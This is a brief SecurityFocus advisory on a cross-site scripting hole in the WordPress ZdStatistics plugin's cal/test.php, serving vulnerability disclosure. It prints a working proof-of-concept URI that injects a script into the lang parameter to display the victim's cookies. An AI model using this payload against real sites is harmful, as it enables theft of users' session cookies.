WordPress ZdStatistics Plugin 'cal/test.php' Cross Site Scripting Vulnerability

To exploit this issue an attacker must entice an unsuspecting victim to follow a malicious URI.

The following example URI is available:

http://www.example.com/wp-content/plugins/zdstats/cal/test.php?lang=�></script><script>alert(document.cookie)</script>&


 

Privacy Statement
Copyright 2010, SecurityFocus